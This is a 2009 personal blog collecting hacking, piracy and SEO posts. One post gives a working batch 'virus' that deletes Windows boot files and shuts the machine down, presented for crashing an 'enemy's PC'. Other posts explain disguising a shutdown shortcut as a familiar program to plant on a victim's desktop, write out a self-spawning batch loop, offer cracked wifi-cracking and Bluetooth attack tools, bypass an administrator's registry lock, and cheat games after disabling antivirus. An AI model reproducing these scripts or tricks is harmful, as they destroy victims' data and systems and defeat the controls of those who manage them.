Increase PR..Trackers can increase your PR

Posted by Shashank Krishna Saturday, January 31, 2009

Getting backlinks (links to your site from others) is necessary to increase your Page Rank in the long term.

Google bots are quite busy. So it is useful to have a page listing all your backlinks to tell them what pages they should analyse. That's why I recommend to dedicate one page of your site to list the pages linking to your page - I say page and not website in purpose-.

But if you're using spamming on blogs, forums and other websites to get backlinks, it would be better to keep track of those backlinks elsewhere than on your website.
Because if your website is linking to too many sites that are not related you may suffer from a downgrade backlash from Google.

So the best tool to keep track of those backlinks (the referrers) to my viewpoint is



Have a look to the tracker created for this blog: My Tracker

All my referrers are listed. When Google bots analyse this page they collect the links. And when they crawl (analyse) them later, they will find links to my blog. For a website it would be better to have a tracker for every page, but for a blog it's easier with only one.

NB: not many backlinks on my tracker because I'm not actively promoting my blog, this blog is indeed a kind of non-lucrative initiative. ;-p

Extreme Tracking has some credit with Google bots, because it's an old domain (the older your domain the better). So the tracker you set up may get a good PR with time (so put the keywords you are competing in the tracker's name when you create it !).


Other aspects of trackers:

Trackers also allow a better understanding of your visitors: you may know the referring link, the keyword used in the search engine and much more.
Data-mining may help to improve your website.

To keep track of your visitors, here below a list of free trackers (but not for SEO):


StatCounter Invisible, no Ads :-)

Activemeter Invisible, no Ads :-)

Motigo Webstats Logo + PopUnder Ads :-(

I strongly recommend the invisible counters. Unfortunately even if Motigo is user-friendly it cannot compete because of those 'damned shit' PopUnder ads.


Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

IP Address tracer....Proxy Switcher

Posted by Shashank Krishna

Proxy Switcher Full Version

http://i15.tinypic.com/4yzkbus.jpg

Hide your IP address from the web sites you visit.
Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
Automatic proxy server switching for improved anonymous surfing.
Easy way to change proxy settings on the fly.
For webmasters - check search engine results from different countries.
Fully compatible with Internet Explorer, Firefox, Opera and others.
Advanced proxy list scanning and management.

Screenshot:

http://www.proxyswitcher.com/pro_ssl.png

Download:

http://www.sharemino.com/file/83/proxyswitcher-pro-rar.html

Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

WiFi hacker..a must have software

Posted by Shashank Krishna


Thousand Dollars Softwares: Windows Wifi Collection (4 in 1)


Everything related to Wifi... A must-use softwares by all wifi users.

This is a collection of programs which are:
- Aircrack_2.1_win32

The aircrack suite is an excellent collection of tools written by Christophe Devine to perform packet capture, packet injection and WEP/WPA cracking.


<script type="text/javascript"><!--
google_ad_client = "pub-7530150858989357";
/* 300x250, created 7/31/09 */
google_ad_slot = "1745039822";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>


- AiroPeek NX v2.02:
Image
Best wireless protocol analyzer and security. Wildpackets' AiroPeek NX is software that performs packet analysis of IEEE 802.11 wireless LANs in support of security audits, site surveys, network management, and troubleshooting.

- Airsnort_0.2.6_win32:
Image
AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered.



<script type="text/javascript"><!--
google_ad_client = "pub-7530150858989357";
/* 300x250, created 7/31/09 */
google_ad_slot = "1745039822";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>



- NetStumbler v0.4.0:
Image
NetStumbler is a tool for Windows that allows you to detect Wireless
Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g.
It has many uses:
• Verify that your network is set up the way you intended.
• Find locations with poor coverage in your WLAN.
• Detect other networks that may be causing interference on
your network.
• Detect unauthorized "rogue" access points in your workplace.
• Help aim directional antennas for long-haul WLAN links.
• Use it recreationally for WarDriving.
Requirements
General Requirements
The requirements for NetStumbler are somewhat complex and
depend on hardware, firmware versions, driver versions and
operating system. The best way to see if it works on your system is
to try it.
Some configurations have been extensively tested and are known to
work. These are detailed at

http://www.stumbler.net/compat

If
your configuration works but is not listed, or is listed but does not
work, please follow the instructions on the web site.
The following are rules of thumb that you can follow in case you
cannot reach the web site for some reason.
• This version of NetStumbler requires Windows 2000, Windows
XP, or better.
• The Proxim models 8410-WD and 8420-WD are known to
work. The 8410-WD has also been sold as the Dell TrueMobile
1150, Compaq WL110, Avaya Wireless 802.11b PC Card, and
others.
• Most cards based on the Intersil Prism/Prism2 chip set also
work.
• Most 802.11b, 802.11a and 802.11g wireless LAN adapters
should work on Windows XP. Some may work on Windows
2000 too. Many of them report inaccurate Signal strength, and
if using the "NDIS 5.1" card access method then Noise level
will not be reported. This includes cards based on Atheros,
Atmel, Broadcom, Cisco and Centrino chip sets.
• I cannot help you figure out what chip set is in any given card.
Firmware Requirements
If you have an old WaveLAN/IEEE card then please note that the
WaveLAN firmware (version 4.X and below) does not work with
NetStumbler. If your card has this version, you are advised to
upgrade to the latest version available from Proxim's web site. This
will also ensure compatibility with the 802.11b standard.
Other Requirements and Compatibility Issues
• Your card must be configured in such a way that it can be
seen by the management software that came with the card.
• The Microsoft-provided Orinoco drivers that come with
Windows 2000 do not work with NetStumbler. Please visit
Windows Update or

www.proxim.com

and upgrade to the
latest drivers.
• When NetStumbler is in "auto reconfigure" mode (the default),
it will occasionally disconnect you from your network. This
enables it to perform its scans accurately, and is not a bug.
• If you have the WLAN card configured to connect to a specific
SSID, NetStumbler may not report any accees points other
than those that have that SSID. Configure your card with a
blank SSID or, if a blank one is not permitted, "ANY" (without
quotes).
*Wifi Drivers (Must Install)

Download Link(s):

Rapidshare:

http://rapidshare.com/files/80716988/Windows_Wifi_Collection_-_aircrack_airsnort_airopeek.rar

Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe


Rapid Hack 3.7 Latest Edition for Rapidshare




No More Download Limit!!
Rapid Hacker can hack / crack / bypass waiting limit at Rapidshare.com and Rapidshare.de. Just copy-paste the Rapidshare link and get unlimited downloads.

Download Link(s):

http://rapidshare.com/files/188905641/Rapid_Hacker_3.7_Final_Edition.rar

Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment

<script type="text/javascript"><!--
google_ad_client = "pub-7530150858989357";
/* 300x250, created 7/31/09 */
google_ad_slot = "1745039822";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

Share/Save/Bookmark





Subscribe




Make XP cooler than Ever with 80 self installer Themes









Download Link(s):

Rapidshare:

http://rapidshare.com/files/133806850/80themes.rar

Please thank us to encourage more like this!
Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Bluetooth hacking tools...

Posted by Shashank Krishna

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.

BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.

BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. Download BTBrowser.

BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.


<script type="text/javascript"><!--
google_ad_client = "pub-7530150858989357";
/* 300x250, created 7/31/09 */
google_ad_slot = "1745039822";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>



Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.

CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.

Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.

Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.

Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.

BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.

Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.

BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.


Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

ETTERCAP......ultimate hacker tool..!!

Posted by Shashank Krishna Friday, January 30, 2009

H o m e N e w s D o w n l o a d S t u f f H i s t o r y F o r u m F A Q S c r e e n s h o t s A u t h o r s S e a r c h...




NG-0.7.3 RELEASED !!

Short Description:

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.

Interface: All this feature are integrated with a easy-to-use and pleasureful ncurses/gtk interfaces. (see screenshots)
Platform: Linux 2.0.x
Linux 2.2.x
Linux 2.4.x
Linux 2.6.x
FreeBSD 4.x 5.x
OpenBSD 2.[789] 3.x
NetBSD 1.5
Mac OS X (darwin 6.x 7.x)
Windows 2000/XP/2003
Solaris 2.x
Required Libraries: libpcap >= 0.8.1
libnet >= 1.1.2.1
libpthread
zlib
Optional Libraries: To enable plugins: libltdl (part of libtool)
To have perl regexp in the filters: libpcre
To support SSH and SSL decryption: openssl 0.9.7
For the cursed GUI: ncurses >= 5.3
For the GTK+ GUI: pkgconfig >= 0.15.0 and:
- Glib >= 2.4.x
- Gtk+ >= 2.4.x
- Atk >= 1.6.x
- Pango >= 1.4.x
If you want SSH1 and/or HTTPS support, ettercap requires OpenSSL libraries
Installation (Please Read):
  • Please note ettercap 0.6.x is deprecated; please upgrade to 0.7.
  • Binaries are not officially provided or supported - you have to compile it yourself (which can be tricky under Windows) or find a third-party binary provider. The developers are unlikely to be swayed on this.
  • Before installation, please ensure you have the correct versions of the above listed libraries. For the best experience you should have them all. Out-of-date or missing libraries are the most common reason for failure.
  • You need to read the documentation in the tgz before and after running ./configure; make; make install.
  • The command-line switches and the etter.conf have changed from 0.6.x to 0.7. You should read and edit the etter.conf to suit.
  • For HTTPS support you need to uncomment the right 'redir' command in etter.conf.
  • In short, read the docs, read the man pages, read the FAQ, read the forums, and then ask questions. ;)
Running Ettercap:
  • You need to select a user interface (no default) using -T for Text only, -C for the Ncurses based GUI, or -G for the nice GTK2 interface (thanks Daten...).




Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe
Reblog this post [with Zemanta]

Enable Regedit If Disabled by Administrator

Posted by Shashank Krishna

Image representing Windows as depicted in Crun...

Image via CrunchBaseHow do you enable Registry Editing again if it has been disabled by your administrator?

Solution1

I found a way to get into the registry editor if it’s been disabled, here how you do it:

1. Disable as much as you can from your startup. Remove programs from your startup folder and such, so as not to lag down the bootup process.

2. Create a new shortcut on your desktop, point it to "C:\Windows\regedit.exe"

3. Log off, then log back on

4. As soon as you see your desktop, double click on the shortcut. The system does not check for policies until a few seconds after it booted up. If you click on the icon fast enough, it should let you get in.

After that, do all you need? After you close it though, it will not open unless you redo step 3 and 4.

Solution2

I found one vbs script to enable the registry editing. and below is the link.

www.dougknox.com/security/scripts_desc/regtools.htm

Solution3

The way to get into registry editing is simple. Open your start menu click Run and paste in the folowing command:
REGaddHKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe
Reblog this post [with Zemanta]

Hack Online Games

Posted by Shashank Krishna

I will show you How to Hack FLASH based Online games using Cheat Engine.
I'm using Cheat Engine 5.2, but you can Download Latest at http://cheatengine.4dwebhosting.com/CheatEngine53.exe

here we go..

1. Open your any Online Flash Game in Firefox or IE Browser, I will hack DesktopTD 1.0 > http://www.handdrawngames.com/DesktopTD/Default.asp?cc=1

2. I hope u have now Opened ur flash game in Browser with no other Browsers window Opened. Now Open Cheat Engine.

3. In CE, click Open Process List & Select firefox.exe & click OK.- see Image

4. ooh, and One More thing I forgot to tell u, Open Calculator.
& now go in DesktopTD game & place some Weapons (Towers), then see how many GOLD you have left.
I placed a Pallet Tower (Cost 5 GOLD)
So now I have left with 75 GOLD.

5. So now I will Multiply 75 x 8 which = 600
(e.g. For example, you want to increase your health from 200 to a higher number. Just multiple 200 with 8 which equals to 1600. At CheatEngine, enter 1600 at the value and click on First Scan button. )

6. Now when a Searched I found 1607 values, but we want less.

7. Now Spend some more GOLD. I spent GOLD on "Squirt Tower" (Cost 15 GOLD). & now i have Left 60 GOLD in pocket.

8. Now in CE, Select Scan Type "Decreased Value" & click on NEXT SCAN > see Image -
9. & now i Found 38 , so Right click on them & click "Select All items" & click that RED arrow > see Image -
10. & now Double click on that 480 value & replace it by 80000, & now spent some Money & now u must have above 9900 GOLD.

enjoy!

You can also hack Online games like WarRock with "WPE pro 0.9"[ http://wpepro.net/ ]
1. Disable AV
2. Run WPE pro 0.9
3. Run WarRock
4. ALT + TAB out of game
5. in WPE pro 0.9 click "Target Program" > select warrock.exe
6. in WarRock go in Urban Ops, Hurt yourself. Now go near a Medic or Weapon Refile point > ALT+TAB > go in WPE pro 0.9 > click Black Triangle [RECORD] > record till 40 or 39 packets > STOP
7. in WPE pro 0.9 > Right click on that Packet > select "add to send list" & "Set send list with this socket id" simultaneously.
8. Click "Send" (near FILTERS)
9. Tick "New send" & click PLAY button
10. New window will POPUP > select "Continuously" & Timer: 100 & then click PLAY.
11. go in warrock & your ammo or Health will get refilled by time by time.
Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Reblog this post [with Zemanta]

Virus code for windows..Crash ur enemy's PC

Posted by Shashank Krishna

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!



type this in notepad

start virus.bat
virus.bat


and save as with this name

virus.bat


ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d
Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Reblog this post [with Zemanta]

Lan chat..no software required!!

Posted by Shashank Krishna

For chating in any lan you dont need any software .Just copy the code in the note pad .

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!
Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Reblog this post [with Zemanta]

How to make virus in Windows

Posted by Shashank Krishna Tuesday, January 27, 2009

We Take no responsibility for any of this tricks , Do it at your own risk ;) . HaveFun

There are several kinds of fake virus messages you can make. I will discuss 4 of them:

1. Fake computer virus error message

This one is by far, the easiest and all you have to do is to make a new text document with notepad, type msg * YOUR MESSAGE and save as anything.bat. As always, make sure that you select All files instead of Text Document.

2. Forced shutdown trojan.
This will display a custom error message and start a countdown which will shut down the computer.

Right-click your desktop and create a new shortcut.
Paste the following code into the Location box in the Create Shortcut
 menu:
shutdown -s -t 30 -c “Your message here”
Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes. Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc.

Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.


And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!

Note: to stop it, open Run from the start menu and type shutdown-a.


3. Endless Command prompt windows trojan
This will open up a series of command prompt windows that will never end.
The basic idea is that there are two .bat files that open the
 other one when opened, so the other one opens the first one again and the windows just won’t stop coming.

How to do this:
1. Fire up notepad and type: 
start 2.bat
2. Save it as 1.bat (make sure you choose all files when saving it)
3. Make another new text document and type: 
start 1.bat
4. Save it as 2.bat into the same folder as the other one.

All you have to do to start it is to click on either of them.

The on
ly way to stop it is to wait for the windows to become so numerous that they are a group on the taskbar. Then you can use Close group to get rid of the bastards.

4. Fake Command prompt trojan viruses
This is also a good way to make the victim believe that a worm is gnawing at their hard drive and that they can’t do anything to stop it.

Open up notepad and type @echo off

  • To make text appear, type it after an echo tag.
  • To have the the commands wait for the user to press any key type pause

(Note: if you write pause >nul it won’t display Press Any key to continue…)

  • To have a complete high-speed description of files in the drive of the .bat file, type dir /s
  • You can also initiate any other command we covered earlier, such as shutdown, error message, etc.

And why no include all of these in one fake virus?

For example:

I can’t post the batch files here, as sharing .bat files over the internet is illegal.
Make sure you don’t do anything stupid with these tips.


Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Importance of Sitemaps

Posted by Shashank Krishna Monday, January 26, 2009

There are many SEO tips and tricks that help in optimizing a site but one of those, the importance of which is sometimes underestimated is sitemaps. Sitemaps, as the name implies, are just a map of your site - i.e. on one single page you show the structure of your site, its sections, the links between them, etc. Sitemaps make navigating your site easier and having an updated sitemap on your site is good both for your users and for search engines. Sitemaps are an important way of communication with search engines. While in robots.txt you tell search engines which parts of your site to exclude from indexing, in your site map you tell search engines where you'd like them to go.

Sitemaps are not a novelty. They have always been part of best Web design practices but with the adoption of sitemaps by search engines, now they become even more important. However, it is necessary to make a clarification that if you are interested in sitemaps mainly from a SEO point of view, you can't go on with the conventional sitemap only (though currently Yahoo! and MSN still keep to the standard html format). For instance, Google Sitemaps uses a special (XML) format that is different from the ordinary html sitemap for human visitors.

One might ask why two sitemaps are necessary. The answer is obvious - one is for humans, the other is for spiders (for now mainly Googlebot but it is reasonable to expect that other crawlers will join the club shortly). In that relation it is necessary to clarify that having two sitemaps is not regarded as duplicate content. In 'Introduction to Sitemaps', Google explicitly states that using a sitemap will never lead to penalty for your site.

Why Use a Sitemap

Using sitemaps has many benefits, not only easier navigation and better visibility by search engines. Sitemaps offer the opportunity to inform search engines immediately about any changes on your site. Of course, you cannot expect that search engines will rush right away to index your changed pages but certainly the changes will be indexed faster, compared to when you don't have a sitemap.

Also, when you have a sitemap and submit it to the search engines, you rely less on external links that will bring search engines to your site. Sitemaps can even help with messy internal links - for instance if you by accident have broken internal links or orphaned pages that cannot be reached in other way (though there is no doubt that it is much better to fix your errors than rely on a sitemap).

If your site is new, or if you have a significant number of new (or recently updated pages), then using a sitemap can be vital to your success. Although you can still go without a sitemap, it is likely that soon sitemaps will become the standard way of submitting a site to search engines. Though it is certain that spiders will continue to index the Web and sitemaps will not make the standard crawling procedures obsolete, it is logical to say that the importance of sitemaps will continue to increase.

Sitemaps also help in classifying your site content, though search engines are by no means obliged to classify a page as belonging to a particular category or as matching a particular keyword only because you have told them so.

Having in mind that the sitemap programs of major search engines (and especially Google) are still in beta, using a sitemap might not generate huge advantages right away but as search engines improve their sitemap indexing algorithms, it is expected that more and more sites will be indexed fast via sitemaps.

Generating and Submitting the Sitemap

The steps you need to perform in order to have a sitemap for your site are simple. First, you need to generate it, then you upload it to your site, and finally you notify Google about it.

Depending on your technical skills, there are two ways to generate a sitemap - to download and install a sitemap generator or to use an online sitemap generation tool. The first is more difficult but you have more control over the output. You can download the Google sitemap generator from here. After you download the package, follow the installation and configuration instructions in it. This generator is a Python script, so your Web server must have Python 2.2 or later installed, in order to run it.

The second way to generate a sitemap is easier. There are many free online tools that can do the job for you. For instance, have a look at this collection of Third-party Sitemap tools. Although Google says explicitly that it has neither tested, nor verified them, this list will be useful because it includes links to online generators, downloadable sitemap generators, sitemap plugins for popular content-management systems, etc., so you will be able to find exactly what you need.

After you have created the sitemap, you need to upload it to your site (if it is not already there) and notify Google about its existence. Notifying Google includes adding the site to your Google Sitemaps account, so if you do not have an account with Google, it is high time to open one. Another detail that is useful to know in advance is that in order to add the sitemap to your account, you need to verify that you are the legitimate owner of the site.

Currently Yahoo! and MSN do not support sitemaps, or at least not in the XML format, used by Google. Yahoo! allows webmasters to submit “a text file with a list of URLs” (which can actually be a stripped-down version of a site map), while MSN does not offer even that but there are rumors that it is indexing sitemaps when they are available onsite. Most likely this situation will change in the near future and both Yahoo! and MSN will catch with Google because user-submitted site maps are just a too powerful SEO tool and cannot be ignored.

COURTESY WEBCONF.COM


Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe
Reblog this post [with Zemanta]

How to Build Backlinks

Posted by Shashank Krishna

It is out of question that quality backlinks are crucial to SEO success. More, the question is how to get them. While with on-page content optimization it seems easier because everything is up to you to do and decide, with backlinks it looks like you have to rely on others to work for your success. Well, this is partially true because while backlinks are links that start on another site and point to yours, you can discuss with the Web master of the other site details like the anchor text, for example. Yes, it is not the same as administering your own sites – i.e. you do not have total control over backlinks – but still there are many aspects that can be negotiated.

Getting Backlinks the Natural Way

The idea behind including backlinks as part of the page rank algorithm is that if a page is good, people will start linking to it. And the more backlinks a page has, the better. But in practice it is not exactly like this. Or at least you cannot always rely on the fact that your contents is good and people will link to you. Yes, if your content is good and relevant you can get a lot of quality backlinks, including from sites with similar topic as yours (and these are the most valuable kind of backlinks, especially if the anchor text contains your keywords) but what you get without efforts could be less than what you need to successfully promote your site. So, you will have to resort to other ways of acquiring quality backlinks as described next.

Ways to Build Backlinks

Even if plenty of backlinks come to your site the natural way, additional quality backlinks are always welcome and the time you spend building them is not wasted. Among the acceptable ways of building quality backlinks are getting listed in directories, posting in forums, blogs and article directories. The unacceptable ways include inter-linking (linking from one site to another site, which is owned by the same owner or exists mainly for the purpose to be a link farm), linking to spam sites or sites that host any kind of illegal content, purchasing links in bulk, linking to link farms, etc.

The first step in building backlinks is to find the places from which you can get quality backlinks. A valuable assistant in this process is the Backlink Builder tool. When you enter the keywords of your choice, the Backlink Builder tool gives you a list of sites where you can post an article, message, posting, or simply a backlink to your site. After you have the list of potential backlink partners, it is up to you to visit each of the sites and post your content with the backlink to your site in it.

You might wonder why sites as those, listed by the Backlink Builder tool provide such a precious asset as backlinks for free. The answer is simple – they need content for their site. When you post an article, or submit a link to your site, you do not get paid for this. You provide them for free with something they need – content – and in return they also provide you for free with something you need – quality backlinks. It is a free trade, as long as the sites you post your content or links are respected and you don't post fake links or content.

Getting Listed in Directories

If you are serious about your Web presence, getting listed in directories like DMOZ and Yahoo is a must – not only because this is a way to get some quality backlinks for free, but also because this way you are easily noticed by both search engines and potential visitors. Generally inclusion in search directories is free but the drawback is that sometimes you have to wait a couple of months before you get listed in the categories of your choice.

Forums and Article Directories

Generally search engines index forums so posting in forums and blogs is also a way to get quality backlinks with the anchor text you want. If the forum or blog is a respected one, a backlink is valuable. However, in some cases the forum or blog administrator can edit your post, or even delete it if it does not fit into the forum or blog policy. Also, sometimes administrators do not allow links in posts, unless they are relevant ones. In some rare cases (which are more an exception than a rule) the owner of a forum or a blog would have banned search engines from indexing it and in this case posting backlinks there is pointless.

While forum postings can be short and do not require much effort, submitting articles to directories can be more time-consuming because generally articles are longer than posts and need careful thinking while writing them. But it is also worth and it is not so difficult to do.

Content Exchange and Affiliate Programs

Content exchange and affiliate programs are similar to the previous method of getting quality backlinks. For instance, you can offer to interested sites RSS feeds for free. When the other site publishes your RSS feed, you will get a backlink to your site and potentially a lot of visitors, who will come to your site for more details about the headline and the abstract they read on the other site.

Affiliate programs are also good for getting more visitors (and buyers) and for building quality backlinks but they tend to be an expensive way because generally the affiliate commission is in the range of 10 to 30 %. But if you have an affiliate program anyway, why not use it to get some more quality backlinks?

News Announcements and Press Releases

Although this is hardly an everyday way to build backlinks, it is an approach that gives good results, if handled properly. There are many sites (for instance, here is a list of some of them) that publish for free or for a fee news announcements and press releases. A professionally written press release about an important event can bring you many, many visitors and the backlink from a respected site to yours is a good boost to your SEO efforts. The tricky part is that you cannot release press releases if there is nothing newsworthy. That is why we say that news announcements and press releases are not a commodity way to build backlinks.

Backlink Building Practices to Avoid

One of the practices that is to be avoided is link exchange. There are many programs, which offer to barter links. The principle is simple – you put a link to a site, they put a backlink to your site. There are a couple of important things to consider with link exchange programs. First, take care about the ratio between outbound and inbound links. If your outbound links are times your inbound, this is bad. Second (and more important) is the risk that your link exchange partners are link farms. If this is the case, you could even be banned from search engines, so it is too risky to indulge in link exchange programs.

Linking to suspicious places is something else that you must avoid. While it is true that search engines do not punish you if you have backlinks from such places because it is supposed that you have no control over what bad guys link to, if you enter a link exchange program with the so called bad neighbors and you link to them, this can be disastrous to your SEO efforts. For more details about bad neighbors, check the Bad Neighborhood article. Also, beware of getting tons of links in a short period of time because this still looks artificial and suspicious.

COURTESY http://www.webconfs.com/

Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe
Reblog this post [with Zemanta]

Are You Planning on Quitting Facebook? Why?

@Flickr

www.flickr.com

About Me

My Photo
Shashank Krishna
Bangalore, up, India
nothin much to say.........doin B.tech in IIIT allahabad loves bloggingn hacking.... :) and loooves blogging
View my complete profile

ads2

topads